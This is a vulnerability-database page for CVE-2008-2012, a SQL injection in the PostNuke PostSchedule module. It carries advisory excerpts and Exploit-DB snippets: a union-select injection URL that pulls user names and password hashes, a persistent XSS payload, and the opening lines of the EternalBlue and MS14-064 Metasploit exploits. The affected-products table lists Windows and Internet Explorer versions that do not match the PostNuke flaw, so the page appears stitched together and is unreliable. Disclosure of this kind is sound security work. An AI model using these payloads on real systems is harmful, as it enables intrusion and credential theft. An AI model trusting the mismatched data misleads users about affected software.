CVE-2008-2012
published 2008-04-30CVE-2008-2012: SQL injection vulnerability in index.php in the PostSchedule 1.0 module for PostNuke allows remote attackers to execute arbitrary SQL commands via the eid…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.10%
61.6th percentile
SQL injection vulnerability in index.php in the PostSchedule 1.0 module for PostNuke allows remote attackers to execute arbitrary SQL commands via the eid parameter in an event action.
Affected
33 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | internet_explorer_10 | — | — |
| msrc | internet_explorer_11 | — | — |
| msrc | internet_explorer_11_on_windows_10_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_for_x64-based_systems | — | — |
| msrc | internet_explorer_9 | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_1909 | — | — |
| msrc | windows_10_version_2004 | — | — |
| msrc | windows_10_version_20h2 | — | — |
| msrc | windows_10_version_21h1 | — | — |
| msrc | windows_10_version_21h2 | — | — |
| msrc | windows_10_version_22h2 | — | — |
| msrc | windows_11_version_21h2 | — | — |
| msrc | windows_11_version_22h2 | — | — |
| msrc | windows_11_version_23h2 | — | — |
| msrc | windows_11_version_24h2 | — | — |
| msrc | windows_11_version_25h2 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_rt_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_msrc8.8HIGH
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fqcv-fqmq-f4vv: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2008-2012 [HIGH] CWE-89 GHSA-fqcv-fqmq-f4vv: SQL injection vulnerability in index
SQL injection vulnerability in index.php in the PostSchedule 1.0 module for PostNuke allows remote attackers to execute arbitrary SQL commands via the eid parameter in an event action.
Microsoft
MapUrlToZone Security Feature Bypass Vulnerability
vendor_msrc·2025-01-14·CVSS 4.3
CVE-2025-21332 [MEDIUM] CWE-41 MapUrlToZone Security Feature Bypass Vulnerability
MapUrlToZone Security Feature Bypass Vulnerability
FAQ: The Security Updates table indicates that this vulnerability affects all supported versions of Microsoft Windows. Why are IE Cumulative updates listed for Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2?
While Microsoft has announced retirement of the Internet Explorer 11 application on certain platforms and the Microsoft Edge Legacy application is deprecated, the underlying MSHTML, EdgeHTML, and scripting platforms are still supported. The MSHTML platform is used by Internet Explorer mode in Microsoft Edge as well as other applications through WebBrowser control. The EdgeHTML platform is used by WebView and some UWP applications. The scripting platforms are used by MSHTML and EdgeHTML but
Microsoft
Internet Explorer Security Feature Bypass Vulnerability
vendor_msrc·2016-05-10·CVSS 8.8
CVE-2016-0188 [HIGH] Internet Explorer Security Feature Bypass Vulnerability
Internet Explorer Security Feature Bypass Vulnerability
Description: A security feature bypass vulnerability exists when Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies. The vulnerability could allow an attacker to bypass Device Guard UMCI policies.
To exploit the vulnerability, a user could either visit a malicious website or an attacker with access to the system could run a specially crafted application. An attacker could then leverage the vulnerability to run unsigned malicious code as though it were signed by a trusted source.
The update addresses the vulnerability by correcting how Internet Explorer validates UMCI policies.
FAQ: I am running Internet Explorer on Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, or Windows Server 2012 R2.
Red Hat
boost regular expression memory corruption flaws
vendor_redhat·2008-01-11·CVSS 5.0
CVE-2008-0171 [MEDIUM] boost regular expression memory corruption flaws
boost regular expression memory corruption flaws
regex/v4/perl_matcher_non_recursive.hpp in the Boost regex library (aka Boost.Regex) in Boost 1.33 and 1.34 allows context-dependent attackers to cause a denial of service (failed assertion and crash) via an invalid regular expression.
Statement: This issue did not affect the version of boost as shipped with Red Hat Enterprise Linux 4 and 6. This issue was addressed in boost packages in Red Hat Enterprise Linux 5 via RHSA-2012:0305.
No detection rules found.
Exploit-DB
BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
exploitdb·2019-08-12·CVSS 4.3
CVE-2014-4035 [MEDIUM] BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
---
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035
Vulnerability
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)
Exploit-DB
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
exploitdb·2019-03-13·CVSS 8.8
CVE-2019-0541 [HIGH] Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
---
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execution Vulnerability
# Google Dork: N/A
# Date: March, 13 2019
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
# Tested on: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
# CVE : CVE-2019-0541
The Microsoft Windows MSHTML Engine is prone to a vulnerability that allows attackers to execute arbitrar
Exploit-DB
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
exploitdb·2017-07-11
CVE-2017-0144 Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
---
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
EDB Note: mysmb.py can be found here ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42315.py
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
exploitdb·2014-11-14
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
to be vulnerable. However, based on our testing, the most reliable setup is on Windows
pla
Exploit-DB
PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection
exploitdb·2008-04-25
CVE-2008-2012 PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection
PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection
---
Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper (kacper1964_at_yahoo.pl)
google:"PostSchedule ver 1"
Vuln:
index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
$Severo:
Moga byc rozne tabele np. pn_users, nuke_users itp.
Homepage: http://devilteam.pl/
# milw0rm.com [2008-04-25]
Unit42
Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
blogs_unit42·2020-07-21·CVSS 10.0
CVE-2020-1350 [CRITICAL] Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
## Executive Summary
In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.
This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53/TCP. Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.
This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS):
- Windows Server 2008/2008 R2
- Windows Server 2012/2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server version 1803/1903/1909/2004 (Server Core installation)
#
Qualys
July Patch Tuesday: 19 Critical Vulnerabilities from Microsoft, plus Critical Adobe Patches
blogs_qualys·2017-07-11·CVSS 7.8
CVE-2017-8589 [HIGH] July Patch Tuesday: 19 Critical Vulnerabilities from Microsoft, plus Critical Adobe Patches
Today Microsoft released patches covering 54 vulnerabilities as part of July’s Patch Tuesday update, with 26 of them affecting Windows. Patches covering 19 of these vulnerabilities are labeled as Critical, all of which can result in Remote Code execution. According to Microsoft, none of these vulnerabilities are currently being exploited in the wild.
Top priority for patching should go to CVE-2017-8589 , which is a vulnerability in the Windows Search service. This vulnerability can be exploited remotely via SMB to take complete control of a system, and can impact both servers and workstations. The issue affects Windows Server 2016, 2012, 2008 R2, 2008 as well as desktop systems like Windows 10, 7 and 8.1. While this vulnerability can leverage SMB as an attack vector, this is not a vulnera
Fortinet
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
blogs_fortinet·2017-03-23·CVSS 8.1
CVE-2017-0104 [HIGH] iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
FORTIGUARD LABS THREAT RESEARCH
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
By Honggang Ren | March 23, 2017
Summary
In November 2016, as part of my FortiGuard research work, I discovered and reported on an iSNS server memory corruption vulnerability in Microsoft Windows Server. On patch Tuesday of March 2017, Microsoft released the Security Bulletin MS17-012 that contain the fix for this vulnerability and identifies it as CVE-2017-0104.
This vulnerability could lead to remote code execution, and is rated as critical by Microsoft. The vulnerability affects Windows Server 2008, 2012, and 2016 versions. Microsoft recommends installing this update immediately.
In this blog I will share the details of this vulnerability.
How to Reproduce
To reproduce the vulne
2008-04-30
Published